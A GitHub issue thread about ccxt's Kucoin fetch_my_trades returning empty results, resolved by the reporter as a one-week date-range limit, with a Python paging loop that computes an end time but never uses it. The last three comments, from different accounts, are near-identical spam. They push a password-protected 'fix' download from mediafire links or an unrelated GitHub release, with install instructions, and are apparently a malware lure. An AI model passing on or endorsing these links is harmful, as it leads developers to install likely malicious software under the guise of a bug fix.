### ISSUE TITLE
Kucoin fetch_my_trades no longer works 

### ISSUE THREAD

**Issue by dakkusingh** [ccxt/ccxt#23415]
### Operating System

MacOS

### Programming Languages

Python

### CCXT Version

CCXT Version: 4.3.82

### Description

fetch_my_trades returns empty - it was working previously

### Code

```
  

```

**Comment by WillPCowan** [comment]
Add some verbose logs to this issue (i.e. set `exchange.verbos = True` and then send the fetch_my_trades request). This method doesn't paginate very consistently across exchanges by the way (in my experience), you probably need to page backward manually.

**Comment by dakkusingh** [comment]
user error.

I hadnt realised that ccxt pagination doesnt work with kucoin's limits
```
Data time range The system allows you to retrieve data up to one week (start from the last day by default). If the time period of the queried data exceeds one week (time range from the start time to end time exceeded 7*24 hours), the system will prompt to remind you that you have exceeded the time limit. If you only specified the start time, the system will automatically calculate the end time (end time = start time + 7 * 24 hours). On the contrary, if you only specified the end time, the system will calculate the start time (start time= end time - 7 * 24 hours) the same way.
```

I had to manually loop through the date range:
example

```
    all_fills = []
    DAY_OFFSET = 7
    start_time = datetime(2024, 1, 1)
    end_time = start_time + timedelta(days=DAY_OFFSET)

    # Convert to milliseconds
    start_time_ms =  int(start_time.timestamp() * 1000)
    end_time_ms = int(end_time.timestamp() * 1000)

    while start_time.timestamp() < datetime.utcnow().timestamp():
      print(f"Downloading trades from {start_time} to {end_time}")
      trades = await self.exchange.fetch_my_trades(since=start_time_ms, limit=500)

      all_fills.extend(trades)

      # offset start_time_ms by 7 days
      start_time = end_time
      end_time = start_time + timedelta(days=DAY_OFFSET)

      start_time_ms = int(start_time.timestamp() * 1000)
      end_time_ms = int(end_time.timestamp() * 1000)

    df = pd.json_normalize(all_fills)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
